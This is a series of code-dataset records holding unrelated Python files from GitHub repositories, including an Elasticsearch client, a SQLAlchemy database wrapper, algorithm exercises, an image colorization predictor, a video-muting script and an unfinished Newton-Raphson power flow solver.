\"soil_sensor.read_battery_response\"\n\nTOPIC_D_SM_SOIL_MEASURE_ADVERTISEMENT_CONNECTION = \"soil_sensor.soil_measure.connection.advertisement\"\nTOPIC_D_SM_SOIL_MEASURE_ADVERTISEMENT = \"soil_sensor.soil_measure.advertisement\"\n","repo_name":"stefantobiasiewicz/bleConnectV2","sub_path":"topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2054122636","text":"import copy\nimport json\nimport time\nimport hashlib\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.client import IndicesClient\nimport elasticsearch.exceptions\n\n# ES 5.x\ntypes = {\n 'int': {'type': 'integer'},\n 'int_NI': {'type': 'integer', 'index': False},\n 'long': {'type': 'long'},\n 'float': {'type': 'float'},\n 'float_NI': {'type': 'float', 'index': False},\n 'keyword': {'type': 'keyword'},\n 'text': {'type': 'text'},\n 'date_yyyyddmm': {'type': 'date', 'format': 'YYYY-MM-dd'},\n 'time_hhmmss': {'type': 'date', 'format': 'HH:mm:ss'},\n 'datetime': {'type': 'date', 
'format': 'YYYY-MM-dd HH:mm:ss.SSSSSSZ||YYYY-MM-dd HH:mm:ss.SSSZ||YYYY-MM-dd HH:mm:ssZ||epoch_millis'},\n 'ip': {'type': 'ip'},\n 'geo_point': {'type': 'geo_point'},\n}\n\n\ndef chunk_generator(iterable, chunk_size):\n chunk = []\n for item in iterable:\n chunk.append(item)\n if len(chunk) == chunk_size:\n yield chunk\n chunk = []\n \n if chunk:\n yield chunk\n\n\nclass EsClient:\n def __init__(self, server):\n self.client = Elasticsearch(server)\n self.indices_client = IndicesClient(self.client)\n self.existing_indexes = set()\n \n def delete_index(self, index):\n try:\n self.indices_client.delete(index)\n except:\n pass\n \n def index_exists(self, index):\n if index in self.existing_indexes:\n # I'm assuming the index doesn't get deleted at runtime\n return True\n \n try:\n if self.indices_client.exists(index):\n self.existing_indexes.add(index)\n return True\n except elasticsearch.exceptions.ConnectionError:\n return False\n \n def _create_index_data(self, mappings, shards, replicas, aliases, settings):\n data = {\n 'settings': {\n 'number_of_shards': shards,\n 'number_of_replicas': replicas\n },\n 'mappings': mappings\n }\n \n if aliases:\n data['aliases'] = aliases\n \n if settings:\n data['settings'].update(settings)\n \n return data\n \n def create_index(\n self,\n index,\n mappings,\n shards,\n replicas=0,\n aliases=None,\n settings=None,\n max_n_try=3\n ):\n if self.index_exists(index):\n return 'exists'\n \n data = self._create_index_data(mappings, shards, replicas=replicas, aliases=aliases, settings=settings)\n \n for iter in range(max_n_try + 1):\n try:\n return self.indices_client.create(index=index, body=data)\n except Exception as e:\n if iter < max_n_try:\n # Possibly a race condition with an other process\n time.sleep(2)\n \n if self.index_exists(index):\n return 'exists'\n else:\n raise e\n \n def create_template(\n self,\n name,\n template,\n mappings,\n shards,\n replicas=0,\n aliases=None,\n settings=None\n ):\n if aliases:\n # Not needed yet, Kibana uses wildcards\n raise NotImplementedError\n \n data = self._create_index_data(mappings, shards, replicas=replicas, aliases=aliases, settings=settings)\n data['template'] = template\n \n self.indices_client.put_template(name, body=data)\n \n def count_query(self, index, query, t=1000):\n return self.client.count(index=index, body=query, request_timeout=t)['count']\n \n def get_query(self, index, query, t=1000, scroll=None):\n # \"search\" is faster than \"scroll\" but doesn't perform well on very large result sets (over 100k)\n if scroll == False or (scroll is None and self.count_query(index, query, t) < 90000):\n yield from self.client.search(index=index, body=query, request_timeout=t)['hits']['hits']\n return\n \n query = copy.deepcopy(query)\n query['size'] = 50000\n scroll_result = self.client.search(index=index, body=query, request_timeout=t, scroll='1m')\n n_yield = 0\n \n for doc in scroll_result['hits']['hits']:\n yield doc\n n_yield += 1\n \n if n_yield == scroll_result['hits']['total']:\n # Nothing to scroll\n return\n \n while n_yield < scroll_result['hits']['total']:\n scroll_result = self.client.scroll(body={'scroll': '1m', 'scroll_id': scroll_result['_scroll_id']}, request_timeout=t)\n \n if not scroll_result:\n return\n \n for doc in scroll_result['hits']['hits']:\n yield doc\n n_yield += 1\n \n def refresh(self, index):\n self.client.indices.refresh(index=index)\n \n def exists(self, index, type, id):\n raise NotImplementedError\n \n def upload_documents(\n self, index, type, docs_iterable,\n 
chunk_size=5000, id_field=None, index_field=None,\n id_from_json=False\n ):\n status = []\n \n fixed_index = isinstance(index, str)\n indexes = set()\n \n if fixed_index:\n indexes.add(index)\n \n for doc_chunk in chunk_generator(docs_iterable, chunk_size):\n data = []\n \n for doc in doc_chunk:\n doc = copy.deepcopy(doc)\n meta = {'_type': type}\n \n if fixed_index:\n meta['_index'] = index\n elif index_field:\n meta['_index'] = doc[index_field]\n del doc[index_field]\n else:\n meta['_index'] = index(doc)\n \n if not fixed_index:\n indexes.add(meta['_index'])\n \n if id_field is not None:\n meta['_id'] = (\n '%d' % int(doc[id_field]) if isinstance(doc[id_field], int) else doc[id_field]\n )\n del doc[id_field]\n js = json.dumps(doc)\n else:\n js = json.dumps(doc)\n \n if id_from_json:\n meta['_id'] = hashlib.sha1(js).hexdigest()\n \n data.append(json.dumps({'index': meta}))\n data.append(js)\n \n data.append('')\n \n status += [i['index']['status'] for i in self.client.bulk(body='\\n'.join(data))['items']]\n \n for index in indexes:\n self.refresh(index)\n \n return status","repo_name":"nikonyrh/docker-scripts","sub_path":"elasticsearch5/esclient.py","file_name":"esclient.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"44447874347","text":"# 메모리 초과\nfrom itertools import permutations\nimport sys\n\ndef formatting(word):\n result = []\n for i in range(len(word)):\n result.append(word[i])\n return sorted(result)\n\ndef solution(words):\n words = list(map(formatting, words))\n answer = []\n for word in words:\n candidates = list(permutations(word, len(word)))\n for candidate in candidates:\n answer.append(''.join(candidate))\n\n for i in range(len(answer)-1):\n if i == i + 1:\n answer.remove(i)\n print(answer[i])\n\ninput = sys.stdin.readline\nn = int(input())\nwords = [input() for _ in range(n)]\nsolution(words)\n","repo_name":"joohyun333/Algorithm_Study_Group","sub_path":"1주차/애너그램/애너그램_jaehwlee.py","file_name":"애너그램_jaehwlee.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35778835464","text":"\n\"\"\"\nhttps://docs.sqlalchemy.org/en/14/tutorial/index.html#a-note-on-the-future\n\n\"\"\"\n\nimport time\nfrom typing import Optional, Any, Callable\n\nimport pandas as pd\n\nfrom sqlalchemy.orm import sessionmaker, Session\nfrom sqlalchemy import create_engine, text, inspect, Engine, Connection\nfrom sqlalchemy.engine import Inspector\nfrom sqlalchemy.sql.schema import MetaData\nfrom crocodile.core import Struct, Display\nfrom crocodile.file_management import List as L, P, OPLike\n\n_ = create_engine, text\n\n\nDisplay.set_pandas_display()\n\n\nclass DBMS:\n \"\"\"Implementation Philosophy:\n * Always use sqlalchemy API and avoid sql-dielect specific language.\n * Engine is provided externally. 
It is the end-user's business to make this engine.\n \"\"\"\n def __init__(self, engine: Engine, sch: Optional[str] = None, vws: bool = False):\n self.eng: Engine = engine\n self.con: Optional[Connection] = None\n self.ses: Optional[Session] = None\n self.insp: Optional[Inspector] = None\n self.meta: Optional[MetaData] = None\n self.path = P(self.eng.url.database) if self.eng.url.database else None # memory db\n\n # self.db = db\n self.sch = sch\n self.vws = vws\n self.schema: Optional[L[str]] = None\n # self.tables = None\n # self.views = None\n # self.sch_tab: Optional[Struct] = None\n # self.sch_vws: Optional[Struct] = None\n self.refresh()\n # self.ip_formatter: Optional[Any] = None\n # self.db_specs: Optional[Any] = None\n\n def refresh(self, sch: Optional[str] = None) -> 'DBMS': # fails if multiple schemas are there and None is specified\n self.con = self.eng.connect()\n self.ses = sessionmaker()(bind=self.eng) # ORM style\n self.meta = MetaData()\n self.meta.reflect(bind=self.eng, schema=sch or self.sch)\n insp = inspect(subject=self.eng)\n self.insp = insp\n self.schema = L(obj_list=self.insp.get_schema_names())\n self.sch_tab: dict[str, list[str]] = {k: v for k, v in zip(self.schema.list, self.schema.apply(lambda x: insp.get_table_names(schema=x)))} # dict(zip(self.schema, self.schema.apply(lambda x: self.insp.get_table_names(schema=x)))) #\n self.sch_vws: dict[str, list[str]] = {k: v for k, v in zip(self.schema.list, self.schema.apply(lambda x: insp.get_view_names(schema=x)))}\n return self\n\n def __getstate__(self) -> dict[str, Any]:\n state = self.__dict__.copy()\n del state[\"con\"]\n del state[\"ses\"]\n del state[\"meta\"]\n del state[\"insp\"]\n del state[\"eng\"]\n if self.path:\n state['path'] = self.path.collapseuser()\n return state\n def __setstate__(self, state: dict[str, Any]) -> None:\n self.__dict__.update(state)\n self.eng = self.make_sql_engine(self.path)\n self.refresh()\n\n @classmethod\n def from_local_db(cls, path: OPLike = None, echo: bool = False, share_across_threads: bool = False, **kwargs: Any): return cls(engine=cls.make_sql_engine(path=path, echo=echo, share_across_threads=share_across_threads, **kwargs))\n def __repr__(self): return f\"DataBase @ {self.eng}\"\n def get_columns(self, table: str, sch: Optional[str] = None):\n assert self.meta is not None\n return self.meta.tables[self._get_table_identifier(table=table, sch=sch)].exported_columns.keys()\n def close(self, sleep: int = 2):\n if self.path:\n print(f\"Terminating database `{self.path.as_uri() if 'memory' not in self.path else self.path}`\")\n if self.con: self.con.close()\n if self.ses: self.ses.close()\n self.eng.pool.dispose()\n self.eng.dispose()\n time.sleep(sleep)\n def _get_table_identifier(self, table: str, sch: Optional[str]):\n if sch is None: sch = self.sch\n if sch is not None:\n return sch + \".\" + table\n else: return table\n\n @staticmethod\n def make_sql_engine(path: OPLike = None, echo: bool = False, dialect: str = \"sqlite\", driver: str = [\"pysqlite\", \"DBAPI\"][0], pool_size: int = 5, share_across_threads: bool = True, **kwargs: Any):\n \"\"\"Establish lazy initialization with database\"\"\"\n if str(path) == \"memory\":\n print(\"Linking to in-memory database.\")\n if share_across_threads:\n from sqlalchemy.pool import StaticPool # see: https://docs.sqlalchemy.org/en/14/dialects/sqlite.html#using-a-memory-database-in-multiple-threads\n return create_engine(url=f\"{dialect}+{driver}:///:memory:\", echo=echo, future=True, poolclass=StaticPool, 
connect_args={\"check_same_thread\": False})\n else: return create_engine(url=f\"{dialect}+{driver}:///:memory:\", echo=echo, future=True, pool_size=pool_size, **kwargs)\n path = P.tmpfile(folder=\"tmp_dbs\", suffix=\".db\") if path is None else P(path).expanduser().absolute().create(parents_only=True)\n print(f\"Linking to database at {path.as_uri()}\")\n return create_engine(url=f\"{dialect}+{driver}:///{path}\", echo=echo, future=True, pool_size=10, **kwargs) # echo flag is just a short for the more formal way of logging sql commands.\n\n # ==================== QUERIES =====================================\n def execute_as_you_go(self, *commands: str, res_func: Callable[[Any], Any] = lambda x: x.all(), df: bool = False):\n with self.eng.connect() as conn:\n result = None\n for command in commands:\n result = conn.execute(text(command))\n conn.commit() # if driver is sqlite3, the connection is autocommitting. # this commit is only needed in case of DBAPI driver.\n return res_func(result) if not df else pd.DataFrame(res_func(result))\n\n def execute_begin_once(self, command: str, res_func: Callable[[Any], Any] = lambda x: x.all(), df: bool = False):\n with self.eng.begin() as conn:\n result = conn.execute(text(command)) # no need for commit regardless of driver\n result = res_func(result)\n return result if not df else pd.DataFrame(result)\n\n def execute(self, command: str, df: bool = False):\n with self.eng.begin() as conn: result = conn.execute(text(command))\n return result if not df else pd.DataFrame(result)\n\n # def execute_script(self, command: str, df: bool = False):\n # with self.eng.begin() as conn: result = conn.executescript(text(command))\n # return result if not df else pd.DataFrame(result)\n\n # ========================== TABLES =====================================\n def read_table(self, table: str, sch: Optional[str] = None, size: int = 100):\n if self.con:\n res = self.con.execute(text(f'''SELECT * FROM \"{self._get_table_identifier(table, sch)}\"'''))\n return pd.DataFrame(res.fetchmany(size))\n\n def insert_dicts(self, table: str, *mydicts: dict[str, Any]):\n cmd = f\"\"\"INSERT INTO {table} VALUES \"\"\"\n for mydict in mydicts: cmd += f\"\"\"({tuple(mydict)}), \"\"\"\n self.execute_begin_once(cmd)\n\n def describe_table(self, table: str, sch: Optional[str] = None, dtype: bool = True):\n print(table.center(100, \"=\"))\n self.refresh()\n assert self.meta is not None\n tbl = self.meta.tables[table]\n assert self.ses is not None\n count = self.ses.query(tbl).count()\n res = Struct(name=table, count=count, size_mb=count * len(tbl.exported_columns) * 10 / 1e6)\n res.print(dtype=False, as_config=True)\n dat = self.read_table(table=table, sch=sch, size=2)\n cols = self.get_columns(table, sch=sch)\n df = pd.DataFrame.from_records(dat, columns=cols)\n print(\"SAMPLE:\\n\", df)\n assert self.insp is not None\n if dtype: print(\"\\nDETAILED COLUMNS:\\n\", pd.DataFrame(self.insp.get_columns(table)))\n print(\"\\n\" * 3)\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"thisismygitrepo/crocodile","sub_path":"myresources/crocodile/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"13507036951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGiven n non-negative integers representing an elevation map where the width of each bar is 1, \ncompute how much water it can trap after raining.\n\nThere is a graphic illustration on the website of 
Leetcode: https://leetcode.com/problems/trapping-rain-water/\n\nIdea: \n    first calculate the intervals (indexes of left and right column) that contain water\n    for each interval, calculate how much water is trapped\n    sum up all the waters\n\"\"\"\n\n\ndef calculate_trapped_water(h):\n    water_intervals = []\n    i = 0\n    while i < len(h):\n        current_interval = find_next_water_interval(h, i)\n        water_intervals.append(current_interval)\n        i = current_interval[1]\n    water_intervals.pop()\n\n    water = 0\n    for water_interval in water_intervals:\n        water += calculate_interval_water(h, water_interval)\n    return water\n    \n\ndef find_next_water_interval(h, i):\n    j = i\n    if j+1 < len(h):\n        while h[j] <= h[j+1] or max(h[j+1:]) < h[j]:\n            j += 1\n            if j >= len(h)-1:\n                break\n    start_idx = j\n    \n    j += 1\n    if j >= len(h)-1:\n        return [len(h), len(h)]\n    \n    while h[j] < h[start_idx]:\n        j += 1\n        if j >= len(h)-1:\n            break\n    \n    if j > len(h)-1:\n        return [len(h), len(h)] \n    return [start_idx, j]\n\ndef calculate_interval_water(h, water_interval):\n    min_column_height = min(h[water_interval[0]], h[water_interval[1]])\n    \n    water_accumulated = 0\n    for i in range(water_interval[0]+1, water_interval[1]):\n        water_accumulated = water_accumulated + min_column_height - h[i]\n    return water_accumulated\n    \n    \n    \nprint(calculate_trapped_water([4,2,0,3,2,5]))\nprint()\nprint(calculate_trapped_water([0,1,0,2,1,0,1,3,2,1,2,1]))\n\n    \n    \n    \n    \n","repo_name":"LuckerZOfficiaL/Coding-Problems","sub_path":"trapping_rain_water.py","file_name":"trapping_rain_water.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4020590488","text":"from PIL import Image\nimport torch\nfrom image_colorization_api.image_colorization.utils import PIL_image_to_model_input, lab_to_rgb\nfrom image_colorization_api import app\n\ndef make_prediction(datastream):\n    '''\n    reads image data stream\n    resizes image to model input size (256)\n    converts to L*a*b* color space\n    gets L features\n    feeds L input features to colorization model to predict ab features\n    reconstructs Lab image from L and ab features\n    converts to RGB color space\n    returns colorized image\n    '''\n    \n    img = Image.open(datastream)\n    data = PIL_image_to_model_input(img)\n    \n    app.model.net_G.eval()\n    with torch.no_grad():\n        app.model.setup_input(data)\n        app.model.forward()\n    \n    ab = app.model.fake_color.detach()\n    img = lab_to_rgb(data['L'], ab.cpu())\n    img = img.squeeze(0)\n    return img","repo_name":"daptecc/image_colorization_api","sub_path":"image_colorization_api/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2291251516","text":"import os\nimport sys\nimport pandas as pd\nfrom moviepy.editor import *\nimport librosa\nimport soundfile as sf\nimport shutil\nimport ffmpeg\nimport subprocess as sp\nfrom env_list import DATA_OUT_PATH, DATA_IN_PATH, PATH_DATA\n\n# Path definitions\nINPUT_DATA = 'clova_result.csv'\n\ntest_data = pd.read_csv(PATH_DATA + 'clova_result.csv', header=0)\npred_df = pd.DataFrame({'sentence': test_data['sentence'], 'start': test_data['start'], 'end': test_data['end'],\n                        'predict': test_data['results']})\n\nstart = []\nend = []\nresult = []\n\nfor i in range(len(pred_df)):\n    start.append(int(pred_df['start'][i] * 44.1))\n    end.append(int(pred_df['end'][i] * 44.1))\n\n    if pred_df['predict'][i] >= 0.7:\n        result.append(1)\n    else:\n        result.append(0)\n\n\ndef 
make_quiet_wav(wav, result, start, end, output_name):\n    quiet, _ = librosa.load(DATA_IN_PATH + 'quiet.wav', sr=44100)  # load the silence file\n    data, _ = librosa.load(wav, sr=44100)  # load the audio file to convert\n    # data -> dividing by the sample rate gives units of seconds (s)\n\n    length = len(result)  # number of segments\n    lenq = len(quiet)  # 694575\n\n    for i in range(0, length):\n        tmp = int(end[i] - start[i])\n        r = result[i]\n        print(\"for loop : [{}] {} : {}\".format(r, start[i] / 44100, end[i] / 44100))\n        if (r == 1):\n            if tmp > lenq:\n                data[end[i] - lenq:end[i]] = quiet[:]\n                print(\"quiet : {}:{}\".format((end[i] - lenq) / 44100, end[i] / 44100))\n            else:\n                data[start[i]:end[i]] = quiet[:tmp] * 1.0\n                print(\"quiet : {}:{}\".format(start[i] / 44100, end[i] / 44100))\n    sf.write(output_name, data, 44100)\n\n\ndef main():\n    global targetloc\n    global targetname\n    if len(sys.argv) < 4:\n        targetloc = sys.argv[1]\n        targetname = sys.argv[2]\n\n    targetname = targetname[:-4]\n    print(targetname)\n    video = targetloc\n\n    data_output = DATA_OUT_PATH\n    print('\\nplease wait! \\n')\n\n    # copy the file (create a duplicate)\n    shutil.copy2(video, data_output + \"copied_\" + targetname + \".mp4\")\n    print('\\nMake copy of video ! \\n')\n\n    videoclip = VideoFileClip(data_output + \"copied_\" + targetname + \".mp4\")\n    audioclip = videoclip.audio\n    audioclip.write_audiofile(data_output + \"copy.wav\")  # extract the audio as wav\n    print('\\nChange mp4 to wav ! \\n')\n\n    make_quiet_wav(data_output + \"copy.wav\", result, start, end, data_output + \"result_{}.wav\".format(targetname))\n\n    video = ffmpeg.input(data_output + \"copied_\" + targetname + \".mp4\").video\n    audio = ffmpeg.input(data_output + \"result_{}.wav\".format(targetname)).audio\n    r = ffmpeg.output(video, audio, data_output + \"result_{}.mp4\".format(targetname),\n                      vcodec='copy', acodec='aac', strict='experimental')\n    ffmpeg.run(r)\n\n    print('\\nNow you can check!!! ')\n\n\nif __name__ == '__main__':\n    data_output = DATA_OUT_PATH\n    try:\n        if not os.path.exists(data_output):\n            os.makedirs(data_output)\n    except OSError:\n        print('Error: Creating directory. ')\n        quit()\n\n    main()\n    print('\\nDone !!! 
\n')\n","repo_name":"Han-YouLim/pbl5-Han-YouLim","sub_path":"pythonDir/makeVideo.py","file_name":"makeVideo.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33725510041","text":"from time import sleep, perf_counter\nimport numpy\n\ndef solution():\n\n    inputFile = open('input','r')\n    # inputFile = open('inputTest','r')\n\n    inputStringList = inputFile.readlines()\n\n    inputFile.close()\n\n    numRows=len(inputStringList)\n\n    caveArray = numpy.empty([numRows,2], dtype=object)\n\n    for i in range(0, numRows):\n        caveArray[i,:] = inputStringList[i].replace('\\n','').split('-')\n\n    #Organize information into list of all caves\n    # and lists of all their connections\n\n    listOfCaves = []\n    listOfConnections = []\n\n    for i in range(0, numRows):\n\n        if not caveArray[i,0] in listOfCaves:\n            listOfCaves.append(caveArray[i,0])\n            listOfConnections.append([caveArray[i,1]])\n        else:\n            listOfConnections[listOfCaves.index(caveArray[i,0])].append(caveArray[i, 1])\n        if not caveArray[i,1] in listOfCaves:\n            listOfCaves.append(caveArray[i,1])\n            listOfConnections.append([caveArray[i,0]])\n        else:\n            listOfConnections[listOfCaves.index(caveArray[i,1])].append(caveArray[i, 0])\n\n    listOfPaths = [['start']]\n    isPathDone = [False]\n\n    while False in isPathDone:\n        for i in range(0, len(listOfPaths)):\n            if not isPathDone[i]:\n                newBranch = False\n\n                for connection in listOfConnections[listOfCaves.index(listOfPaths[i][-1])]:\n                    if connection.isupper() or not connection in listOfPaths[i]:\n                        if not newBranch:\n                            newBranch = True\n                            listOfPaths[i].append(connection)\n                            if connection == 'end':\n                                isPathDone[i] = True\n                        else:\n                            listOfPaths.append(listOfPaths[i].copy())\n                            listOfPaths[-1][-1]=connection\n                            isPathDone.append(False)\n                            if connection == 'end':\n                                isPathDone[-1] = True\n                if not newBranch:\n                    isPathDone[i] = True\n\n    listOfCompletePaths = []\n\n    for path in listOfPaths:\n        if path[-1] == 'end':\n            listOfCompletePaths.append(path)\n\n    print(\"There are \", len(listOfCompletePaths), \"paths out of the caves.\")\n\n\nstart = perf_counter()\nsolution()\nend = perf_counter()\nexecution_time = (end - start)\nprint(execution_time)","repo_name":"JeremiahSchroeder/AdventOfCode2021","sub_path":"Day12/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73150747628","text":"import sys\nimport tkinter\nfrom tkinter import filedialog as fd\nimport sympy as sp\nimport numpy as np\nimport pandas as pd\nnp.set_printoptions(threshold=sys.maxsize)\n\ndef open_file():\n    \"\"\"\n    Opens a specified .xlsx file through a dialog box.\n\n    Returns\n    -------\n    str\n        A string containing the filepath for the selected file.\n    \"\"\"\n    tkinter.Tk().withdraw()\n    filepath = fd.askopenfilename(title=\"Select a file\",\n                                  filetypes=[(\"Excel files\", \"*.xlsx\")])\n    print(f\"The selected file's path is: {filepath}\")\n    return filepath\n\ndef parse_to_dataframe(excel_file):\n    \"\"\"\n    Parses an excel file into several dataframes to extract contents related to\n    buses, lines, transformers, loads and generators for power systems.\n\n    Parameters\n    ----------\n    excel_file : str\n        Contents of a .xlsx file with information related to power flow cases.\n\n    Returns\n    -------\n    Array of DataFrames\n        An array containing a set of DataFrames taken from the spreadsheet.\n    \"\"\"\n    data = pd.ExcelFile(excel_file)\n    contents = ['Basis', 'Buses', 
'Lines', 'Transformers',\n 'Loads', 'Capacitors', 'Generators']\n vector = []\n for item, position in enumerate(contents):\n try:\n vector.append(data.parse(contents[item]))\n except ValueError:\n print(f\"ValueError: Expected DataFrame {contents[item]} not found\")\n sys.exit()\n return vector\n\ndef generate_matrices(vector):\n \"\"\"\n Converts an array of DataFrames into individual matrices.\n\n Parameters\n ----------\n vector: array\n Contains a set of DataFrames that will be converted to matrices.\n\n Returns\n -------\n matrices\n Matrices for each of the DataFrames contained in vector.\n \"\"\"\n matrices = []\n for index, position in enumerate(vector):\n matrices.append(vector[index].values)\n return matrices\n\ndef add_lines_items_to_matrix(matrix, system):\n \"\"\"\n Returns the matrix with modified values based on lines data from the power\n system.\n\n Parameters\n ----------\n matrix: matrix\n Matrix to be filled with line impedance values.\n data: array\n Array that contains information about the lines admittances.\n\n Returns\n -------\n matrix\n Matrix with modified impedance entries.\n \"\"\"\n lines_data = system['lines']\n buses_data = system['buses']\n for index, position in enumerate(lines_data):\n bus_1 = int(lines_data[index][0])\n bus_2 = int(lines_data[index][1])\n impedance = complex(lines_data[index][2],lines_data[index][3])\n susceptance = complex(0,lines_data[index][4])\n admittance = 1/impedance + susceptance/2\n matrix[bus_1-1][bus_2-1] -= admittance\n matrix[bus_2-1][bus_1-1] -= admittance\n matrix[bus_1-1][bus_1-1] += admittance\n matrix[bus_2-1][bus_2-1] += admittance\n return matrix\n\ndef add_transformers_items_to_matrix(matrix, data):\n \"\"\"\n Returns the matrix with modified values based on transformers data from the\n power system.\n\n Parameters\n ----------\n matrix: matrix\n Matrix to be filled with tolerance impedance values.\n data: array\n Array that contains information about the transformers admittances.\n\n Returns\n -------\n matrix\n Matrix with modified impedance entries.\n \"\"\"\n for index, position in enumerate(data):\n bus_1 = int(data[index][0])\n bus_2 = int(data[index][1])\n impedance = complex(data[index][2],data[index][3])\n admittance_cc = 1/impedance\n bus_tap = data[index][5]\n parameter_A = admittance_cc/bus_tap\n parameter_B = admittance_cc/bus_tap*(1/bus_tap-1)\n parameter_C = admittance_cc*(bus_tap-1)/bus_tap\n admittance = parameter_A + (parameter_B + parameter_C)/2\n matrix[bus_1-1][bus_2-1] = matrix[bus_1-1][bus_2-1] + admittance\n matrix[bus_2-1][bus_1-1] = matrix[bus_2-1][bus_1-1] + admittance\n return matrix\n\ndef admittance_matrix(system):\n \"\"\"\n Returns the admittance matrix for a power system.\n\n Parameters\n ----------\n power_system: dict\n Dictionary containing data necessary to determine the admittance matrix for\n a power syste.\n\n Returns\n -------\n matrix\n The admittance matrix for the specified power system\n \"\"\"\n buses = system['buses']\n transformers = system['transformers']\n matrix = np.zeros(shape=(len(buses), len(buses)), dtype=np.complex_)\n matrix = add_lines_items_to_matrix(matrix, power_system)\n matrix = add_transformers_items_to_matrix(matrix, transformers)\n return matrix\n\ndef initial_vector():\n \"\"\"\n Returns a vector for voltages and angles of a power system for a Newton Raphson\n iteration.\n\n Parameters\n ----------\n s\n \"\"\"\n return\n\ndef generic_functions():\n Vk, Vi, Gki, Bki, theta_ki = sp.symbols('Vk, Vi, Gki, Bki, theta_ki')\n active_power_function = 
Vk*Vi*(Gki*sp.cos(theta_ki)+Bki*sp.sin(theta_ki))\n reactive_power_function = Vk*Vi*(Gki*sp.sin(theta_ki)-Bki*sp.cos(theta_ki))\n partial_derivative_p_theta = sp.Derivative(active_power_function,theta_ki).doit()\n partial_derivative_p_v = sp.Derivative(active_power_function,Vk).doit()\n print(active_power_function, '\\n', reactive_power_function, '\\n', partial_derivative_p_theta)\n return active_power_function, reactive_power_function\n\ndef generic_powers(system, voltages, angles):\n \"\"\"\n Returns two functions previously filled with the corresponding values for active\n and reactive powers for Newton Raphson method.\n\n Parameters\n ----------\n power_system: dict\n Dictionary containing data related to parameters needed to calculate powers.\n \"\"\"\n Vk, Vi, Gki, Bki, theta_ki = sp.symbols('Vk, Vi, Gki, Bki, theta_ki')\n active_power_function = Vk*Vi*(Gki*np.cos(theta_ki)+Bki*np.sin(theta_ki))\n reactive_power_function = Vk*Vi*(Gki*np.sin(theta_ki)-Bki*np.cos(theta_ki))\n active_power_function.evalf(subs={Vk:{1}, Vi:{1}, Gki:{}, Bki:{}, theta_ki:{}})\n reactive_power_function.evalf(subs={Vk:{1}, Vi:{1}, Gki:{}, Bki:{}, theta_ki:{}})\n # active_power = 0\n # active_powers = []\n # reactive_power = 0\n # reactive_powers = []\n buses = system['buses']\n matrix = np.zeros(shape=(len(buses), len(buses)), dtype=np.complex_)\n bars = len(voltages)\n for p_index, position in bars:\n for p_sub_index, sub_position in bars:\n active_power = active_power + (\n V[p_index]*V[p_sub_index]*(\n G[p_index][p_sub_index]*np.cos(theta[p_index][p_sub_index]) + (\n B[p_index][p_sub_index]*np.sin(theta[p_index][p_sub_index]))))\n if p_sub_index == bars:\n active_powers.append(active_power)\n active_power = 0\n else:\n continue\n for q_index, position in bars:\n for q_sub_index, sub_position in bars:\n reactive_power = reactive_power + (\n V[q_index]*V[q_sub_index]*(\n G[q_index][q_sub_index]*np.cos(theta[q_index][q_sub_index]) + (\n B[q_index][q_sub_index]*np.sin(theta[q_index][q_sub_index]))))\n if q_sub_index == bars:\n reactive_powers.append(reactive_power)\n reactive_power = 0\n else:\n continue\n return active_powers, reactive_powers\n\ndef partial_derivative(expression, respect_with, **kwargs):\n \"\"\"\n \n \"\"\"\n derivative = sp.Derivative(expression, respect_with).doit()\n derivative.evalf(subs={})\n return\n\ndef generic_jacobian(iteration):\n \"\"\"\n Returns the jacobian for a power system filled with the corresponding values\n for the partial derivatives.\n\n Parameters\n ----------\n voltages: array\n Bus voltages for the power system.\n angles: array\n Angles between buses.\n conductances: array\n Conductances for the lines.\n susceptances: array\n Susceptances for the lines.\n \"\"\"\n voltages = voltages\n angles = angles\n conductances = conductances\n susceptances = susceptances\n return\n\ndef iterative(iteration):\n \"\"\"\n Returns the approximate value for a Newton Raphson power flow solution.\n\n Parameters\n ----------\n voltages: array\n Corresponding buses voltages connected through lines with the desired bus.\n angles: array\n Corresponding angles between the desired bus and each connected bus through\n a line.\n conductances: array\n Corresponding conductance for the lines connecting the desired bus with the\n rest of the buses.\n susceptances: array\n Corresponding susceptance for the lines connecting the desired bus with the\n rest of the buses.\n \"\"\"\n voltages = voltages\n angles = angles\n conductances = conductances\n susceptances = susceptances\n return\n\nprint(\n 
\"\"\"\n Por favor seleccione el archivo de excel al cual desea aplicar el método de\n Newton Raphson.\n \"\"\"\n )\ninput(\"Presione enter para continuar.\")\nexcel = open_file()\ndataframes = parse_to_dataframe(excel)\n# print(dataframes[0], \"\\n\", dataframes[1], \"\\n\", dataframes[2])\nmatrices_with_contents = generate_matrices(dataframes)\npower_system = {\n \"basis\" : matrices_with_contents[0][0][0],\n \"buses\" : matrices_with_contents[1],\n \"lines\" : matrices_with_contents[2],\n \"transformers\" : matrices_with_contents[3],\n \"loads\" : matrices_with_contents[4],\n \"capacitors\" : matrices_with_contents[5],\n \"generators\" : matrices_with_contents[6]\n}\nadmittance_matrix(power_system)\ngeneric_functions()\n# for i, element in enumerate(power_system):\n # print(power_system[f\"{element}\"])\n# print(dataframes)\n# 